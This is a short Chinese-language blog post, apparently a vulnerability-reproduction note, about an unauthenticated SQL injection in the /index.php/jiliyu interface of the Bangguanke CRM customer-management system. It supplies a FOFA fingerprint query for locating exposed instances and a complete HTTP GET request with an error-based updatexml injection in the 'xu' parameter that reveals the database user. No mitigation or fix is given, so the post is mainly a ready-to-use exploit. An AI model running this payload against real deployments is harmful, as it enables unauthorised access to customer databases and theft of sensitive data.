Babing
Published on 2024-08-30 / 0 Visits
0
0

B1-1帮管家-CRM-SQL

B1-1帮管家-CRM-SQL

漏洞描述:

帮管客CRM 客户管理系统/index.php/jiliyu 接口存在 sql 注入漏洞,未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。

网站图片:

image-20240620193425039

网络测绘:

fofa语法:

FOFA:app=“帮管客-CRM”

漏洞复现:

payload:

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

效果图:
查询当前用户


Comment